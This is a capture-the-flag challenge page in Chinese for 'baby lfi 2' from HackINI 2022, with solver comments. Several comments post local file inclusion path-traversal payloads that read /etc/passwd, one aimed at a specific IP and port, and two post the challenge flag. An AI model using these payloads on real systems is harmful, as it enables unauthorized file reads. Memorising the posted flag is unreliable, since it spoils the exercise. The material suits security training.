baby lfi 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 2601
提  示:
描  述:
What about making things a bit harder ?
评论
maxiaoyu 27天前

根据上一题也就是baby lfi 1我们依旧使用language来作为参数,根据题目提示,有一个目录是languages的合法目录,因此我们进入这个目录,并使用多个../来退回到根目录,并访问/etc/passwd来拿到flag。

回复 0

000ooo 1年前

?language=./languages/../../../../etc/passwd

回复 1

pandarking 1年前

shellmates{yOU_M4De_yOUr_waY_7hRough_iT}

回复 0

ljt1016 1年前

为什么不合法就要增加中间的路径(../)?以及,为什么/language前面要加个"."

回复 0

小白帽来挖个漏洞 1年前

https://blog.csdn.net/guanrongl/article/details/142907012

回复 2

MOCHAOLIN 1年前

http://82.157.146.43:15979/?language=./languages/../../../../etc/%70%61%73%73%77%64

回复 0

1005667204 1年前

./language/../../../../../etc/passwd

回复 0

YOLO77w 1年前

和baby lfi 一样的方法

回复 0

15346899030 1年前

shellmates{yOU_M4De_yOUr_waY_7hRough_iT}

回复 1

xiaoxiao972521 1年前

/index.php?language=./languages/../../../../etc/passwd

回复 0

WriteUp

image
gushi666

2 金币

评分(6)

解题动态

zerogoctf 攻破了该题 1天前
帅Yu 攻破了该题 2天前
yyt030 攻破了该题 2天前
Icey艾希 攻破了该题 3天前
erobot 攻破了该题 3天前
oohyodec 攻破了该题 4天前
出题人我会一直让你等着 攻破了该题 4天前
xuyp 攻破了该题 4天前
2790819062 攻破了该题 5天前
noooo 攻破了该题 5天前
1921682550 攻破了该题 5天前
Fengyu3321 攻破了该题 6天前
六眼飞鱼 攻破了该题 7天前
意料之中是戏 攻破了该题 7天前
Tim.Drake 攻破了该题 9天前
Dawn123 攻破了该题 9天前
jhgtx 攻破了该题 10天前
linxi789654 攻破了该题 10天前
lyy 攻破了该题 10天前
1211020612 攻破了该题 12天前
问题反馈